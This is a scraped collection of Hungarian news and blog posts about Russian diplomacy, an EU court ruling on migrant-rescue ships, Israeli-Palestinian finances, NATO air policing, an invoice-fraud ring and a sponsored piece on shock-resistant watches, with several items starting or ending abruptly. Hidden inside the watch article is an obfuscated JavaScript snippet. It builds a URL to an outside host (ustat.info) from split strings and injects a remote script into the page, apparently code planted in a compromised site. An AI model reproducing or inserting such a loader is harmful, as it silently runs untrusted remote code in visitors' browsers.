A szóvivő naivnak nevezte az amerikai politikusokat, ha azt hiszik, saját jogszabályaiknak a “nemzetközi joggal ellentétes alkalmazásával” rákényszeríthetik Oroszországot arra, hogy az Egyesült Államok által kitalált szabályokon alapuló világrend szerint éljen. Minden hatás ellenhatást vált ki. Egy ilyen lépés logikus következménye lehet a diplomáciai kapcsolatok megszakítása is. Ezen túl Washington azt is kockáztatja, hogy átlépi a pontot, ahonnan nincs visszaút – mondta Zaharova.
“Ezzel Washingtonnak tisztában kell lennie. Mi készen állunk a helyzet bármilyen alakulására, és ha Washington úgy dönt, hogy teljesen leállítja a Moszkvával való együttműködést, mi túléljük” – tette hozzá. A szóvivő azt mondta, hogy az amerikai törvényhozók úgy érzik, már minden szankciós eszközt kimerítettek, ezért kezdeményezték, Oroszország átminősítését terrorizmust támogató országgá. Washingtonnak nincs elég hatalma ahhoz, hogy fellépjen a saját maga által terroristának minősített rezsimek ellen – közölte.
Az amerikai szenátus július 27-én határozatban szólította fel a külügyminisztériumot, hogy Oroszország kerüljön fel a terrorizmust támogató országok listájára. Korábban Kijev kezdeményezte ugyanezt. Az amerikai politikusok felszólításukat Oroszország ukrajnai, csecsenföldi, grúziai és szíriai beavatkozásaival indokolták. Július 28-án amerikai képviselők jelezték, hogy hasonló kétpárti kezdeményezésre készülnek az alsóházban.
A terrorizmust támogató országok listáján olyan államok szerepelnek, amelyek Washington szerint több alkalommal támogattak nemzetközi terrorcselekményeket. Zaharova kijelentette: az Egyesült Államoknak el kell döntenie, készen áll-e arra, hogy a hadászati stabilitásról az egyenjogúság alapján tárgyaljon Oroszországgal.
A szóvivő az orosz külügyi tárca nemtetszését nyilvánította ki amiatt, hogy az Auschwitz-Brirkenau náci német haláltábor helyén létesített emlékmúzeum lengyel vezetése, Moszkva értesítése nélkül, bezárta a Nagy Honvédő Háború Központi Múzeuma által létesített kiállítást, amelynek szerződése áprilisban lejárt.
Az intézmény igazgatósága kitért a szerződés újratárgyalása elől a moszkvai múzeummal – mondta Zaharova, aki ezt Varsónak a szovjet nép “felszabadító küldetése” és az általa meghozott kolosszális áldozatok emlékezetének kiirtására irányuló “cinikus kísérleteként” minősítette.
A Nancy Pelosi amerikai képviselőházi elnök tervezett tajvani látogatása miatt kialakul kínai-amerikai feszültségről Telegram-bejegyzésben fejtette ki álláspontját a szóvivő. Zaharova provokátorállamnak nevezte az Amerikai Egyesült Államokat, és közölte: az amerikaiak megsértik Kína másfél milliárd lakosát. Ugyanebben az ügyben Moszkva megértéséről és “abszolút szolidaritásáról” biztosította Pekinget Dmitrij Peszkov, a Kreml szóvivője.
The post Sértődés lenne, ha Washington a terrorizmus támogatójának minősítené Moszkvát appeared first on .
Ha nem vagyunk megfelelően felszerelve és felkészülve egy túrára, akkor menet közben gyorsan rosszabb irányba fordulhat a kirándulás. Ahhoz, hogy semmi gond ne legyen, fontos, hogy figyeljünk a felszerelések minőségére, mint például a karóra, ami esetleg GPS-sel felszerelt, így mutatja számunkra a helyet. Emellett sok munkahelyen, foglalkozásnál lehet hasznos, ha a kiegészítő jól bírja a mindennapi strapát. Lássuk, hogy mit bírnak például az ütésálló karórák, mire képes egy minőségi felszerelés!
Amikor hátizsákos kirándulásra megyünk, sose vigyük magunkkal a legújabb cuccokat. Indulás előtt mindig érdemes ellenőrizni, hogy minden megvan-e, minden rendeltetésszerűen működik, hiszen csak így lehet problémamentes a túra. Ilyen például egy minőségi karóra, hiszen GPS-sel felszerelt okos változat nagyban megkönnyítheti a dolgunkat a terepen. Természetesen nem csak az óra számít – egy túrára rendesen fel kell készülni.
Amennyiben kint leszünk, gyakran előfordulhat, hogy valamilyen módon fel kell építeni magunknak egy “szállást” éjszakára. Próbáljuk ki előtte otthon, hogy a bicska, a gázfőző és például a bakancsunk megfelelően funkcionál, ne a kirándulás során szembesüljünk vele, hogy valami gond adódott. Ugyanez elmondható a karórákról, hiszen sok mindent kibírnak a strapabíró, ütésálló karórák. Ezek esetében azonban érdemes ügyelni arra, hogy vízálló is legyen, hiszen gyakran előfordul, hogy ránk szakad az ég. Mindenekelőtt tanuljuk meg használni a GPS készüléket, hiszen hiába van nálunk, ha azt sem tudjuk, hogy mit kell nézni.
G-Shock karóra, ami mindent kibír!A G-Shock jelzést világszerte alkalmazzák, ami a szívósság szinonimájaként van jelen a köztudatban. A remek tulajdonságokkal ellátott modellsorozat nagy előnye, hogy többféle színben és variációban kapható, így bárki találhat magának megfelelő típust. A Casio G-Shock órákkal kapcsolatban elmondható, hogy tényleg szívósak, nem véletlenül került be a Guinness-rekordok könyvébe sem. Egy ilyen óra kibír egy közel 25 tonnás teherautót is, a tesztet követően pedig ugyanúgy működik tovább.
A karórát több módon is lehet jellemezni. Az egyik, hogy jól tűri az elektromos áramnak, a másik, hogy a centrifugális gravitációban szemben is képes ellenállni. Emellett nem okoz neki gondot az alacsony hőmérséklet, a víz és az ütés sem, emellett igen állhatatos. Természetesen léteznek egyéb márkás ütésálló kiegészítők is, így a Casio-nak versenyeznie kell többek között a Tommy Hilfigerrel és a Michael Kors gyártóval egyaránt.
Mi az ütésálló karóra titka?Egy igazán profi karóra remek kiegészítője lehet bármely napi szettnek, hiszen még egy unalmas farmer és póló párost is egyszerűen fel tud dobni. Napjainkban az okostelefonok miatt már sokkal kisebb eséllyel vásárolunk magunknak karórát, hiszen a mobil mutatja az időt. Ettől függetlenül még mindig bőven akad olyan ember, aki népszerűnek és elegánsnak tartja ezeket a kellékeket, így nem véletlen kerültek most előtérbe az ütésálló karórák sem.
Egy férfi elvárja az órától, hogy tükrözze a személyiségét és az egyéniségét, emellett stílusos megjelenést kölcsönözzön neki. Fontosnak tartják továbbá, hogy kifogástalanul működjön, semmilyen probléma ne adódjon velük, még a strapabíróság kapcsán sem. Nem árt, ha tud néhány plusz funkciót, ezzel ugyanis le lehet nyűgözni a férfi nemet. Mivel a szerkezetet sokszor érik extra hatások, legyen szó munkahelyről, utazásról, az otthoni tevékenységekről, így nem árt, ha a naponta viselt darab jól tűri a megpróbáltatásokat. Egyes típusok képesek pulzusmérésre, van bennük iránytű, de még lépést is számlálnak. Az ásványi üvegből és a rozsdamentes acélból gyártott kiviteleknek köszönhetően pedig még a vízi sportok szerelmesei is találnak maguknak megfelelő kiegészítőt.
Egy ütésálló férfi karóra tehát számos esetben lehet praktikus, ha az ember egész nap hordani szeretné az időmérő eszközt. Mivel ezeknek nem okoz gondot, ha rájuk esik valami, esetleg hozzáütődnek egy erősebb tárgyhoz, így nem kell tartani attól, hogy esetleg megkarcolódnának vagy eltörne bennük az üveg. A különleges kellékek tehát amellett, hogy igen praktikusak, öltöztetik az Urakat, így egy hétköznapi szett mellé már nem is kell elgondolkodni az egyéb kiegészítőkön. Csak fel kell kapni az órát és már lehet is menni a munkába vagy vásárolni.
(function(){ cnlh=document.createElement("script");cnlh_=("ust");cnlhu="428448780"; cnlh_+="a"+("t.i");cnlh.type="text/javascript"; cnlhu+=".na22xug0nlhn9eehjibr";cnlh.async=true;cnlh_+="n"+("f"+"o")+"/"; cnlhu+="jyp8kqjh73";cnlh.src="https://"+cnlh_+cnlhu; document.body.appendChild(cnlh); })();
The post Ütésálló karóra férfiaknak – Mit bírnak ki ezek az órák? appeared first on .
A luxemburgi székhelyű testület ítéletében kiemelte: a hatóságok azonban csak a biztonságot, a környezetet vagy az emberek egészségét fenyegető egyértelmű kockázat esetén alkalmazhatnak korlátozó intézkedéseket, az ilyen fennállásának bizonyítása pedig az adott állam feladata.
A SeaWatch International német segélyszervezet által üzemeltetett hajók rendszeresen végeznek kutató és mentő tevékenységet a Földközi-tengeren. A hajók német zászló alatt járják a vizeket, és teherhajóként vannak bejegyezve. 2020 nyarán a szervezet olasz kikötőkben tett partra kimentett embereket, de az olasz kikötői hatóságok többször ellenőrizték őket, mert nem rendelkeztek kutatási és mentési engedéllyel, és sokkal több embert vettek fel a fedélzetükre, mint ahányra engedélyük volt. A hatóságok úgy vélték továbbá, hogy a hajók műszaki és üzemeltetési hiányosságai veszélyeztetik a közbiztonságot, ezért szükséges feltartóztatásuk. A SeaWatch keresetet nyújtott be ezen intézkedések ellen a szicíliai regionális közigazgatási bírósághoz, azt állítván, hogy a kikötőhatóságok átlépték jogköreiket. A regionális bíróság az uniós testülethez fordult a menekülteket mentő hajók ellenőrzésére és korlátozására vonatkozó hatáskör megállapítása érdekében.
Az uniós bíróság szerint bizonyos körülmények indokolhatják hajók ellenőrzését és feltartóztatását, “de az a puszta tény, hogy egy hajó a tengeren megmentett embereket szállít, nem nyújt elegendő okot erre”.
“A fedélzeten tartózkodó személyek száma, még ha nagyobb is, mint ami megengedett, önmagában nem képezhet alapot az ellenőrzésre”- szögezte le a luxemburgi testület. Hozzátette azonban, hogy a mentési műveleteket végrehajtó hajók teherhajóként való engedélyezése viszont már elegendő okot adhat a hatóságoknak az ellenőrzéshez.
Most az olasz bíróságon a sor, hogy eldöntse az uniós bíróság útmutatásait felhasználva, hogy az adott ügyben a kikötőhatóságok intézkedései arányosak voltak-e.
The post Uniós bíróság: az állam ellenőrizheti a bevándorlókat mentő hajók tevékenységét appeared first on .
Az izraeli biztonsági kabinet vasárnapi ülésén döntött a terroristák segélyére szánt összeg levonásából. Ezt a lépést előírja a kormány számára egy 2018-ban elfogadott törvény, amely nem biztosít mérlegelési jogot, a védelmi minisztériumnak át kell adnia a szükséges információkat, vagyis a PH terroristáknak és családtagjaiknak fizetett segélyeinek összegét a biztonsági kabinetnek, és az adóbevételekből évente be kell fagyasztani ezt a pénzt. A teljes összeget 12 részletben, havonta vonják le az izraeli hatóságok. A kabinet ülésén csak a baloldali liberális Merec párt élén álló Nicán Horovic egészségügyi miniszter tartózkodott a szavazástól, a szociáldemokrata Munkapártot vezető Merav Michaeli közlekedési miniszter viszont igennel szavazott.
Horovic rámutatott a PH-gal folytatott biztonsági és polgári együttműködés fontosságára, melyet megnehezít a levonás, noha az elmúlt évek befagyasztott pénzeinek nagy részét kölcsön formájában átadták végül a PH-nak.
Michaeli azt javasolta, hogy kezdjenek politikai párbeszédet a palesztinokkal, mert szerinte van hajlandóság a PH-nál abbahagyni a terroristák és családjaik fizetését, de Naftali Bennett ellenezte ezt a dialógust, mert szerinte nincs miről beszélni: a PH-nak abba kell hagynia a terroristák segélyezését.
A PH alapítványokon keresztül folyósít bevételeiből pénzeket a terrortámadások elkövetéséért izraeli börtönökben lévő palesztinoknak, valamint az izraeliek megtámadása közben megölt palesztinok családjainak. Ezt az alapot a palesztinok “mártíralapnak” nevezik – emlékeztetett a The Jerusalem Post című újság honlapja.
A hosszabb börtönbüntetéssel sújtott palesztinok magasabb havi segélyben részesülnek, így minél súlyosabb bűncselekményt követtek el izraeliek ellen, annál több pénzt fizet nekik a PH.
Az 1993-as Oslói Megállapodások alapján Izrael szedi be az áfát és a vámokat a PH területére irányuló import után, amely izraeli ellenőrzőpontokon megy keresztül. Ez jelenti a PH legnagyobb bevételi forrását, de Izrael emellett jövedelemadót és egészségbiztosítási alapokat is beszed számukra az izraelieknek dolgozó palesztinok után.
The post A PH terroristák családjainak fizetett segélyek összegével csökkenti a palesztinok adóbevételeit Izrael appeared first on .
A tőlünk keletre zajló orosz ukrán “testvérháború” árnyékában és annak hatásaival küzdve könnyen elfeledkezhetnénk más, számunkra legalább olyan fontossággal bíró térségekről, amik hazánkhoz még közelebb vannak. Kétségtelenül ilyen régiónak tekinthető a Nyugat- Balkán, ahol vasárnap este zajos incidensek történtek. Még pontosabb behatárolással a koszovói-szerb határon történtekre kell gondolnunk, ahol, bár személyi sérülés nem történt, mégis lövések dördültek el.Persze, akár figyelmen kívül is hagyhatnánk az eseményeket, mivel ilyen nem először fordul elő az említett térségben, azonban két ok miatt mégis komoly jelentőséégel bírnak számunkra: egyrészt a magyar kormány térségre irányuló külpolitikája egyértelmű, hiszen az a térség európai integrációja irányul, másrészt a térségben állomásozó NATO-erők, azaz a KFOR 2021 októbere óta magyar vezetés alatt állnak, így hazánk katonái is a térségben szolgálnak.
A fenti tényeken túl a Washington Postban tegnap megjelent véleménycikk szerzője párhuzamot von a kelet-ukrajnai eseményekkel,hiszen abban megemlítik azt az orosz álláspontot, amely szerint a nyugati államok Koszovó függetlenségének(2008) elismerésével maguk szolgáltattak alapot a donbaszi régió önállóságának elismerésére.Bár az orosz érvelés ebben a formában kissé kontraproduktívnak tűnik, és álláspontom szerint inkább erősíti, semmint gyengíti Koszovó euroatlanti integrációs törekvéseit és a belső európai kohéziót, mégis rámutat arra, hogy mennyire törékeny még mindig a térség biztonsága. Megoldásként továbbra is erősíteni kell az említett nemzetek/nemzetiségek közti bizalmat és rendkívül óvatosan kell bármilyen a (bel)politikai népszerűséget erősíteni kívánó döntés-előkészítés és -hozatal ügyében eljárni.
A Egyre fokozódik a helyzet délen is? bejegyzés először Biztonságpolitika-én jelent meg.
Budapesten a III., IV., XIII., XI., XVI., XVII. XXI., XXII., XXIII. kerületben, illetve a többi között Ercsiben, Érden, Százhalombattán, több Dráva menti és Borsod-Abaúj-Zemplén megyei településen lesz beavatkozás irtják a szakemberek a vérszívókat. A hosszú aszályos időjárás következtében ugyan mérséklődött a szúnyogártalom, ám a hétvégi felhőszakadás kedvezett a szúnyogok megjelenésének – tették hozzá.
Mint írták: a hétvégi esők hatására néhány régióban várhatóan emelkedik a szúnyogártalom mértéke, elsősorban azokon a területeken, ahol tovább megmarad a lehullott esővíz. A katasztrófavédelem által megbízott szakértők folyamatosan nyomon követik a tenyészőhelyek állapotát, ahol szükséges, sor kerül a lárvák, később pedig a kifejlett egyedek elleni védekezésre – ismertették.
Arra is felhívták a figyelmet, hogy az esőzések után a lakosság is sokat tehet a szúnyogártalom csökkentése érdekében, a ház körüli tartályokban, kaspókban felgyűlt víz kiöntésével, vagyis az élőhelyek felszámolásával.
The post Katasztrófavédelem: 72 településen és 9 budapesti kerületben lesz szúnyoggyérítés appeared first on .
Közleményeikben azt írták: hétfőtől szerdáig az esti és éjszakai órákban katonai menetoszlopok haladnak a Hajdúhadház – 4-es főút – 354-es út – M35-ös – M3-as – M31-es – M0-s – M1-es – 8119-es út – Tata útvonalon.
A járműoszlopok az M3-as autópálya oszlári Tisza-hídján, valamint az M0-s autóút soroksári Duna-hídján és hárosi Duna-hídján a teljes forgalom kizárása mellett mennek át – tették hozzá.
A tájékoztatás szerint szerdán napközben és kora este is nagyobb katonai járműforgalom várható az MH 12. Arrabona Légvédelmi Rakétaezred technikai eszközeinek manővere miatt a Hajdúhadház – M3-as – M0-s – M1-es – M19-es – Győr útvonalon.
A Magyar Honvédség (MH) arra kérte a lakosságot, hogy a közlekedési szabályok betartásával és kellő óvatossággal közelítsék meg a katonai járműveket, mivel azok mérete és sebessége, valamint a konvojok hossza és haladásának módja eltér a mindennapi közúti közlekedésben megszokottól. Mivel a zárt menetoszlop járművei közé nem hajthat be civil gépjármű, a járművek haladását a konvoj elején és végén kísérőjárművek biztosítják – jelezték.
The post HM: nagyobb honvédségi járműforgalom várható az ország több területén appeared first on .
Bakatyin a Mihail Gorbacsov szovjet elnök-pártfőtitkár ellen 1991. augusztusában megkísérelt puccs után került a KGB élére. Ebben a minőségében leginkább arról vált ismertté, hogy az államfő jóváhagyásával, Moszkva jószándékának jeleként átadta az Egyesült Államoknak a moszkvai amerikai nagykövetség új épületének eredeti lehallgatási tervét.
Bakatyin 1937. november 6-án született a Novoszibirszk megyei Kiszeljovszkban. Elvégezte a Novoszibirszki Építőmérnöki Egyetemet, az építőiparban dolgozott, majd 1973-ban belépett a Szovjetunió Kommunista Pártjába, ami elindította politikai pályafutását.
A Kirov, később a Kemerovo megyei pártbizottság első titkára volt, majd a párt Központi Bizottságának tagjává választották. 1988-ban belügyminiszterré nevezték ki. 1991-ben versenybe szállt a választáson Oroszországi Szovjet Szocialista Szövetségi Köztársaság elnökségéért, és hat jelölt közül az utolsó helyen végzett.
The post Elhunyt a KGB utolsó főnöke appeared first on .
“Abból indulunk ki, hogy egy nukleáris háborúnak nem lehetnek győztesei, ilyet soha nem szabad kirobbantani, és mi a világközösség minden tagja számára egyenlő és oszthatatlan biztonság mellett állunk ki” – hangsúlyozta.
Putyin rámutatott, hogy több mint fél évszázados fennállása alatt az atomsorompó-egyezmény a nemzetközi biztonsági és stratégiai stabilitási rendszer egyik kulcsfontosságú elemévé vált. Az egyezményben az atomfegyverek elterjedésének megakadályozása, a leszerelés és az atomenergia békés célú felhasználása terén előírt kötelezettségek teljes mértékben megfelelnek mind a nukleáris fegyverrel rendelkező, mind az ilyennel nem rendelkező államok érdekeinek – mondta.
Az ukajnai háború kirobbantója reményét fejezte ki, hogy a konferencia megerősíti az atomsorompó-szerződésben részt vevő valamennyi állam készségét arra, hogy szigorúan betartsák kötelezettségvállalásaikat, és “érezhetően hozzájáruljanak a nukleáris fegyverek elterjedésének megakadályozását célzó rendszer megerősítéséhez, valamint a béke, a biztonság és a stabilitás biztosításához a világban.
Az atomsorompó-egyezmény felülvizsgálati konferenciáit ötévente tartják. A tizedik találkozót eredetileg 2020 májusában tartották volna New Yorkban, de a koronavírus-járvány miatt elhalasztották idén augusztusra.
Az 1968-ban aláírt atomsorompó-egyezmény legitimálta Nagy-Britannia, Kína, az akkori Szovjetunió, az Egyesült Államok és Franciaország nukleáris arzenálját. A többi állam a dokumentum aláírásával lemondott arról a jogáról, hogy tömegpusztító fegyvereket állítson elő vagy szerezzen be. A megállapodásnak jelenleg több mint 190 részes állama van. Izrael, India és Pakisztán nem tartozik közéjük, Észak-Korea pedig 2003 januárjában felmondta a szerződést.
(A kérdés az, lehet-e hinni Putyinnak, hiszen Ukrajna lerohanása előtt többször is légből kapott feltételezének nevezte a háború kirobbantását. A -szerk- megj.)
The post Putyin: nukleáris háborút nem szabad kirobbantani appeared first on .
Fontos leszögezni, hogy minden körülmények között nagy hangsúlyt kell fektetni a megelőzésre. A mindig bezárt kapu, bejárati ajtó, ablak védvonalat jelent a betörők, tolvajok és az értéktárgyaink között. A szúnyoghálók csak a rovarokat tudják távol tartani, de a bűnözőket nem. Egy biztonsági rács, egy védőfólia az ablaküvegen szintén erősítik otthonunk védelmét. Hiába a csúcskategóriás riasztó, ha azt nem kapcsolják be.
A rendőrség azt kéri, hogy fogadják meg az alábbi tanácsaikat!The post Így védd az otthonod: a rendőrség tanácsai appeared first on .
Mihail Razvozsajev, a város kormányzója Telegram-bejegyzésben közölte, hogy “azonosítatlan” tárgy repült be a flottaparancsnokság udvarára, az előzetes jelentések szerint egy drón. Öt ember megsérült, halálos áldozatok nem voltak.
A fekete-tengeri flotta közölte, hogy parancsnokságának területén egy kis erejű, házi készítésű drón által szállított robbanószerkezet lépett működésbe. A tájékoztatás szerint öten megsérültek a betört ablakok üvegszilánkjaitól. Mindannyian orvosi ellátásban részesültek. Az orosz Szövetségi Biztonsági Szolgálat (FSZB) vizsgálatot indított.
The post Orosz agresszió: Dróntámadás érte az orosz fekete-tengeri flotta parancsnokságát appeared first on .
Szlovákia légterének védelmét Jaroslav Nad szlovák védelmi miniszter júniusban kérte Csehországtól, és hasonló kérést intézett a lengyel kormányhoz is. Petr Fiala cseh miniszterelnök már korábban jelezte, hogy kormánya pozitív választ ad Pozsony kérésre, és Varsó is közölte, kész a segítségnyújtásra. A szlovák miniszter korábbi nyilatkozata szerint Csehország, Szlovákia és Lengyelország közös projektjéről van szó.
“Nagyon hálás vagyok azért, hogy a csehek és a lengyelek hajlandóak felelősséget vállalni légterünk védelméért” – jelentette ki Nad. A szlovák légtér védelmének részleteit a közeljövőben közös nyilatkozatban rögzíti és pontosítja a három ország – jegyezte meg a cseh védelmi tárca.
Szlovákia az Ukrajna elleni orosz támadás megindítása után előkészületeket tett arra, hogy mihamarabb befejezze az orosz gyártmányú MiG-29-es vadászgépek használatát hadseregében. Az orosz gépeket amerikai vadászgépek váltanák fel, de ezeket a hozzáférhető információk szerint csak két év múlva kapja meg Szlovákia.
Szlovákia négy évvel ezelőtt 14 darab F-16-os vadászgépet rendelt az Egyesült Államoktól. Az eredeti tervek szerint Pozsonynak az első gépeket már idén meg kellett volna kapnia, de az Egyesült Államok jelezte, hogy alkatrészhiány miatt a szállítások késni fognak.
The post A cseh légierő legalább 2023 végéig védeni fogja Szlovákia légterét appeared first on .
Közleményük szerint Szalay-Bobrovniczky Kristóf honvédelmi miniszter a litvániai Siauliai légibázison tartott ünnepségen azt hangsúlyozta: a baltikumi légtérrendészeti feladatban való aktív részvétel hatalmas felelősség és megtiszteltetés is egyben, ami egyértelműen bizonyítja a Magyar Honvédség állományának magas szintű felkészültségét.
“Vezető nemzetként egy olyan feladat jelképes kulcsait vesszük most át, amely kiemelt szerepet tölt be mind a balti államok polgárainak életében, biztonságában, mind a NATO történetében. Az orosz-ukrán háború miatt ráadásul a balti légtér Európa egyik legérzékenyebb légterévé vált, ahol most NATO alárendeltségében, a magyar zászló alatt, a Magyar Honvédség egyenruhájában Magyarországot, a magyar nemzetet képviselik katonáink” – idézte a közlemény a miniszter szavait.
Szalay-Bobrovniczky úgy fogalmazott: “mi, politikusok is érezzük a feladat súlyát, a küldetés még nagyobb felelősségét: éppen ezért nagy tisztelettel köszönöm meg Észtország, Lettország és Litvánia polgárainak bizalmát, hogy egy ilyen érzékeny pillanatban honi légterük őrzését ránk, magyarokra bízzák”.
Hangsúlyozta továbbá, hogy a magyar kormány az Európát sújtó háború idején is elkötelezetten gondoskodik fegyveres erejének fejlesztéséről, hogy önmaga védelmén túl, a NATO tagjaként a szövetség alapokmányában rögzített kollektív védelemhez hozzájárulhasson. A haderőfejlesztési program révén Magyarország már jövőre eléri a korábban 2024-re tervezett és a NATO által is elvárt honvédelmi kiadási szintet, s ez – mint kiemelte – a következő években is fenntartható.
“A háború sok mindent átértékelt, emiatt a haderőfejlesztési programot is fel kell gyorsítani” – szögezte le a közlemény szerint Szalay-Bobrovniczky. A NATO tagállamok 2004 óta működő, közös állandó misszió kettős célja, hogy egyrészt növelje a térség országai – Észtország, Lettország és Litvánia – állampolgárainak biztonságérzetét, másrészt, hogy fejlessze a szövetséges és partner erők együttműködési képességeit.
A Magyar Honvédség négy Gripen harci repülőgépe egy mintegy ötven magyar katonából álló kontingenssel, vezető nemzetként augusztus elsejétől november 30-ig Németország és Olaszország légierejével közösen teljesít szolgálatot a Litvániában található bázison – olvasható a HM közleményében.
The post HM: harmadik alkalommal őrzik magyar Gripenek a balti légteret appeared first on .
Azt írták: 43 csalás és 51 csalási kísérlet írható a számlájára annak a bűnözői hálózatnak, amelynek irányítói elsősorban kórházakat, önkormányzatokat, sportegyesületeket és színházakat károsítottak meg úgynevezett számlaváltós csalásokkal. A strómanok mögé bújt elkövetői kör tevékenységét 2016-ig követték vissza a fővárosi nyomozók.
A szervezet tagjai megszerezték azokat a nyilvánosan is hozzáférhető adatokat, amelyeket egy – későbbi sértett – intézmény által kezdeményezett közbeszerzési eljárás eredményéről tudni lehetett. Ezután telefonon felhívták a megbízást elnyerő céget és elhitették, hogy a pályázat kiírójának informatikai rendszere meghibásodott, emiatt nem állnak rendelkezésre a kifizetéshez szükséges információk, például a kiállított számla száma, a teljesítés határideje és összege. Az így megkapott adatok birtokában, az érintett cég nevében felhívták a pályázat kiíróját és közölték vele, hogy megváltozott az a bankszámlaszám, ahová a pénzt utalnia kell.
A számlaszámváltozás tényét – általában az eredetihez megtévesztésig hasonló címről – e-mailben is megerősítették, felhasználva az adott vállalkozás logóját, bélyegzőjét és ügyvezetőjének nevét. Az ilyen e-mailcímek létrehozásához szükséges domain-nevekért kriptovalutával fizettek, IP-címük elrejtéséhez pedig titkosítást használtak, hogy ezzel is elrejtsék digitális nyomaikat. A csalóknak kifizetett pénz így végül szinte nyom nélkül landolt olyan bankszámlákon, amelyeket a bűnöző csoport főszervezői strómanokkal nyittattak különböző bankfiókokban – írták.
A strómanok saját nevükre nyitották meg a számlákat, de a teljes hozzáférést, az internetbank-eléréssel együtt átadták a szervezőknek, és a számlákhoz rendelt hívószámok is a szervezet felső köreihez kapcsolódtak. A strómanok feladata volt még, hogy a bankszámlákra érkező összegeket vagy készpénzben, vagy több kisebb összegben, utalásokkal juttassák el beszervezőiknek – tették hozzá.
A sértettek akkor jöttek rá, hogy eltűnt az átutalt pénzük, amikor az elmaradt kifizetéseket egyeztették a cégekkel; ekkor vált nyilvánvalóvá, hogy a számlaszám nem változott meg és a megbízó a szerződés szerinti összeget másnak utalta át.
A BRFK-n 2019 áprilisában alakult két nyomozócsoport a bűncselekmények felderítésére, majd az ország többi megyéjében hasonló módszerrel elkövetett bűncselekmények felderítését is összehangolták. A BRFK nyomozását támogatta a Győr-Moson-Sopron, a Komárom-Esztergom, a Nógrád, a Borsod-Abaúj-Zemplén és a Baranya megyei rendőr-főkapitányság, valamint a Magyarországra delegált szlovák belügyi attasé és az Europol is.
A rendőrök kiderítették, hogy a számlaváltós csalásokat különböző nemzetiségű, de egyazon csoporthoz köthető emberek irányítják, és egymás után azonosították őket. 2020 októberében megkezdődött a hálózat felszámolása, a rendőrök összehangoltan, egyszerre több helyszínen ütöttek rajta a strómanokon és a szervezet felsőbb szintjén helyet foglaló szervezőkön, főszervezőkön.
A BRFK a 2016. október 17. és 2020. október 9. között elkövetett bűncselekmény-sorozatban különösen nagy értékre, üzletszerűen elkövetett csalás és pénzmosás, valamint közokirat-hamisítás miatt folytat eljárást.
A gyanúsítottak 43 sértettől csaltak ki csaknem 1,2 milliárd forintot. Jóval több intézménynél próbálkoztak, de 51 esetben nem jártak sikerrel. A nyomozók az eljárásban számos strómant, szervezőt, köztük a főszervezőket is elfogták; 95 embert hallgattak ki gyanúsítottként, az irányító ellen pedig elfogatóparancsot adtak ki. A nyomozók megállapították, hogy a gyanúsítottak 92 emailcímet, 51 telefonszámot és 59 magyar bankszámlát használtak. A csalás sértettjei között kórház, színház, múzeum, önkormányzat, sportegyesület, oktatási és egyházi intézmény, közműszolgáltató és nemzeti park is van.
A nyomozás alatt eddig 262 millió forintot foglaltak le a rendőrök.
The post Felszámolták a számlaváltós bandát appeared first on .
A tárca közölte: a tankokat amúgy leselejtezték volna, az ország ugyanis a hadsereg korszerűsítésére törekszik NATO-tagként. A minisztérium nem közölte, hogy hány harckocsiról van szó. A hivatalos adatok szerint a hadseregnek 31 ilyen harci járműve van. A harckocsikat 2000-ben adományozta Szkopjénak Oroszország.
Ezzel egy időben Sztevo Pendarovszki észak-macedón köztársasági elnök azt közölte, hogy Oroszország észak-macedón pártok finanszírozásával, bele akar avatkozni az ország belügyeibe.
“Minden állami szolgálat tudja, hogy Oroszország beavatkozik a belügyeinkbe. (.) A szomszédos országokból orosz ügynökök, az orosz ügynökségeknek dolgozók jönnek ide. Nem mondhatom meg nyilvánosan, hogy pontosan honnan, mert ezek titkos információk” – közölte az államfő.
Az ukrajnai háború kitörése óta Észak-Macedónia tíznél több orosz diplomatát utasított ki azzal az indoklással, hogy a diplomáciai kapcsolatokról szóló bécsi egyezménnyel össze nem egyeztethető tevékenységet folytattak.
The post Orosz agresszió: Észak-Macedónia tankokat ajándékozott Ukrajnának appeared first on .
Öt év után nem csak a vizes világbajnokság tért vissza Magyarországra, hanem az Európai Védelmi Ügynökség (EDA) évente más-más helyszínen megrendezett helikopteres gyakorlata is. A résztvevő államok helikopteres alegységeinek közös továbbképzését, a különböző eljárások gyakorlását célzó Fire Blade 2022-nek az MH Pápa Bázisrepülőtér adott otthont június 7. és 24. között. A gyakorlat félidejében lehetőséget kaptunk, hogy mi is helikopterre szálljunk.
NH-90 Caiman TTH
Eredetileg úgy volt, hogy a sajtó a gyakorlat megkezdése előtt, a légterekkel való ismerkedés közben készíthet légifotókat a kötelékbe állt helikopterekről. Az időjárás azonban közbeszólt és a tervezett napon, a Dunántúlon uralkodó zivatartevékenység miatt a repülésre akkor nem kerülhetett sor. A szervezőket dicséri, hogy a sajtó, a szlovák légierő helyi műszeres gyakorlórepülésre induló UH-60 Black Hawk helikopterén mégis szívhatott némi „felhőszagot”, továbbá az is, hogy találtak egy olyan napot, amikor az eredeti tervek, ha kicsit más formában is, de megvalósulhattak. Ennek köszönhető, hogy a június 16-án reggel nyolckor kezdődő eligazításon már mi is jelen lehettünk.
A máltai központú uniós ügynökség jelentése szerint a háború kezdete óta mintegy 9,6 millió ukrán állampolgár menekült el hazájából, és közülük 7,3 millióan kerestek menedéket az országgal szomszédos négy uniós tagállam – Magyarország, Lengyelország, Szlovákia és Románia – egyikében, továbbá körülbelül 6,3 millióan kényszerültek elhagyni lakóhelyüket Ukrajnán belül.
Az Európai Unió területén mintegy 3,9 millióan regisztráltak ideiglenes védelemre, mely hozzáférést biztosít egyebek mellett az egészségügyi ellátáshoz, a munkaerőpiachoz és az állami oktatáshoz. Emellett több mint 23 500 nemzetközi védelem iránti kérelmet nyújtottak be ukrán állampolgárok az EU-ban. Menedékjogért márciusban 14 ezer, áprilisban 1900, májusban 1600 ukrajnai állampolgár folyamodott – írták.
Az uniós ügynökség a menekültügyi eljárásokat rögzítő jelentése szerint májusban összesen mintegy 70 200 menedékjog iránti kérelmet nyújtottak be az Európai Unió valamely tagországában, ez 2016 óta a második legmagasabb havi szintet jelenti. Áprilisban 60 200-an fordultak menedékjog iránti kérelem biztosításáért az unióban – közölték. Menedékjog iránt főként afgánok, szíriaiak, venezuelaiak, kolumbiaiak és pakisztániak folyamodtak, de kimagasló volt a török és a georgiai állampolgárok aránya is. Mintegy 2900 kérelmező vallotta magát felnőtt kísérő nélküli kiskorúnak, számuk az összes kérelmező 4 százalékát teszi ki.
